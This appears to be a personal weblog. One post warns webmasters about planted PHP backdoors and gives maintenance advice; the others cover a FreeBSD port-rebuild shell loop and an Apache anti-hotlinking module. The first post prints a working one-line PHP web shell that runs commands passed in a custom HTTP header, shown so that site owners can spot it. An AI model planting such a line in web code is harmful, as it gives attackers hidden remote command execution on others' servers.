dpk’s weblog

Are you a webmaster who is concerned about hackers infesting your sites? Well, be on the look out for crud like this:

<? passthru(getenv(“HTTP_ACCEPT_jayman”)); ?>

This script can be used by sending whatever command you want in a “Accept-jayman:” HTTP header. “jayman” is just an example (a prevelant one), it could be anything. This can be placed to any of your PHP scripts without affecting your user’s experience, because the header is not something sent by any browser. Headers are also not typically logged anywhere, so the attacker may not be caught by inspecting logs.

I’ve seen this come up quite often, and it actually seems to be getting worse. Most of the time the attackers just want a place to run an IRC bot (iroffer), but often they want to redirect your surfers to their affiliate program links, send spam, or use your site to host their spam advertised content.

If you see something like this in your scripts, or on its own, it was put there by an attacker using another exploitable script on your site. It’s very important to keep your site’s scripts up-to-date, and it’s a good idea to hire someone to audit your code or keep it up to date, if you’re not a programmer yourself. (Be aware that whoever you hire may not actually be able to debug all of your scripts, if any of them use Zend Encoder created files.)

It’s also important to make sure your permissions are not overly open. PHP scripts, typically, run as the web server’s user. If your directory permissions are open (777, for example), and you have an exploitable script, someone could easily create their own files in the directory, and even replace your files with their own copies.

Ultimately, the best advice I can give is to check your site’s contents often, keep your software up to date, keep your permissions sane, and hire someone knowledgable and trustworthy to check out your site if find you need help.

When is stability going to finally trump features?

In just about anything related to computers, there’s a tug of war between adding new features or fixing bugs. … in the general computing world, people don’t get sued for bugs, and adding new features is much more fun and sexy than fixing bugs.

I’m in total agreement with this guy. Just going for the free trackback here, heh.

If you ever find yourself in my situation, where installing some updated port from a relatively freshly done cvsup ends up breaking a couple dozen other programs because it decided to upgrade several libraries, you might find the following for loop useful:

cd /usr/X11R6/bin && for m in $(for l in $(for j in $(for i in *; do
ldd $i 2>/dev/null | grep -q "not found" && echo $i; done);do
egrep "bin/$j" /var/db/pkg/*/+CONTENTS;done | sort -u | cut -f1 -d:);do
grep " ORIGIN" $l;done | cut -f2 -d: | sort -u);do
cd /usr/ports/$m && make && make deinstall && make reinstall;done

Obviously, the above is evil in itself, so it should be considered a “quick fix” and nothing more. Enjoy!

mod_hotlink is some software I wrote ages ago to deal with the problem of how to politely* prevent one site from linking to images on another, without using tons of CPU (as does mod_rewrite solutions)

From the README:

Protects non-text content against “hotlinking” – a method for stealing
bandwidth by linking images and content from other websites to present
them as if they were their own.

For Apache 1.3, fully tested with 1.3.26, also works with later
versions. Not tested and not expected to work with 2.x without some
effort. Finally got around to creating a project for it, so hopefully
if it is found to be of use, a group effort will make something more
of it.

Please note: The Referer header sent by browsers is completely
optional, and often untrustworthy. There is very little anyone can
do about that. So, this won’t protect you from all hotlinking. In
practice, it works for most browsers.

* Politely as in people can still do it if they disable sending of referrer information, of course.